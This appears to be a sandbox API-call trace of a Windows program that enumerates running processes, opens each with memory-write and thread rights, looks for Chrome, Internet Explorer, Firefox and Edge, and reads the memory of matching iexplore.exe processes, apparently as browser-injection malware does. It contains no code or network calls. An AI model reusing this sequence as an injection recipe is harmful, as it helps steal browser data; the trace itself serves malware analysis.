	[0215.021] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0215.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0215.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0215.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x445c
	[0215.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.024] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0215.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.024] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.025] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0215.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.026] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0215.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x4460
	[0215.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.028] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0215.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.028] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.029] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0215.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.029] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0215.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x4464
	[0215.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.031] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0215.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.031] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.032] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0215.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.032] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0215.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4468
	[0215.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.033] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0215.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.034] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.034] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0215.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.035] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.035] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0215.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x446c
	[0215.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.036] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0215.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.037] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.038] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0215.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.039] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.039] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0215.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4470
	[0215.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.040] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0215.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.041] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.041] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0215.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.042] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.042] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0215.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4474
	[0215.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.043] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0215.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.044] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.044] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0215.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.045] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.045] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0215.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4478
	[0215.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.047] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0215.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.047] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.048] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0215.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.049] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.049] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0215.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x447c
	[0215.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.050] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0215.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.051] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.051] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0215.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.051] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.052] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0215.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4480
	[0215.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.053] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0215.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.053] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.054] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0215.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.054] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0215.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4484
	[0215.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.055] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0215.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.056] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.057] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0215.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.057] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.058] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0215.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4488
	[0215.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.059] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0215.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.060] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.061] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0215.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.062] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.180] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0215.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x448c
	[0215.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.182] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0215.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.183] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.184] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0215.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.185] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0215.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4490
	[0215.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.187] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0215.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.187] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.188] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0215.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.189] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.190] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0215.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4494
	[0215.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.191] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0215.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.191] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.192] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0215.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.192] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.192] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4498
	[0215.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.193] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.194] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.194] NtQueryInformationProcess (in: ProcessHandle=0x4498, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.195] ReadProcessMemory (in: hProcess=0x4498, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0215.195] ReadProcessMemory (in: hProcess=0x4498, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0215.195] ReadProcessMemory (in: hProcess=0x4498, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0215.195] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.195] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0215.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x449c
	[0215.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0215.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0215.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0215.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.197] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.197] NtQueryInformationProcess (in: ProcessHandle=0x449c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0215.197] ReadProcessMemory (in: hProcess=0x449c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0215.197] ReadProcessMemory (in: hProcess=0x449c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0215.197] ReadProcessMemory (in: hProcess=0x449c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0215.197] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0215.198] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x44a0
	[0215.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.198] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.199] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.199] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.199] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0215.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x44a4
	[0215.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.200] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0215.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.201] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.201] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0215.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.201] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x44a8
	[0215.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.203] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.203] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.204] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.204] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.204] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.205] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x44ac
	[0215.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.206] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.206] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.207] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.207] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.207] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0215.208] CloseHandle (hObject=0x188) returned 1
	[0215.208] Sleep (dwMilliseconds=0x64) 
	[0215.330] GetCurrentProcessId () returned 0x110
	[0215.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0215.332] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0215.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
